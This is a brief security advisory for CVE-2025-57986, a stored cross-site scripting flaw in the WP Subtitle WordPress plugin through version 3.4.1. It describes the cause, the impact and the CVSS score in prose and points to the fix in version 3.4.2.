CVE-2025-57986

Vulnerability

Overview

The WP Subtitle plugin for WordPress versions 3.4.1 and earlier contains a stored cross-site scripting (XSS) vulnerability due to improper neutralization of user-supplied input during web page generation [1]. The flaw resides in the subtitle field, where input is not sanitized before being stored and later rendered on the page.

Exploitation

Details

An attacker with contributor-level privileges or higher can inject arbitrary JavaScript or HTML into the subtitle field [1]. When a privileged user (e.g., admin or editor ) views a page containing the malicious subtitle, the script executes in their browser. This qualifies as stored XSS because the payload persists in the database and triggers on subsequent visits.

Impact

Successful exploitation enables an attacker to perform actions such as redirecting visitors to malicious sites, injecting advertisements, or stealing session cookies [1]. The CVSS v3 base score is 6.5 (Medium), reflecting the need for authenticated access but the potential for significant impact on site integrity and user trust.

Mitigation

The vendor has released version 3.4.2 which resolves the vulnerability [1]. Users are strongly advised to update immediately. For sites that cannot update, applying a web application firewall rule to filter subtitle input may reduce risk, but updating is the only complete fix.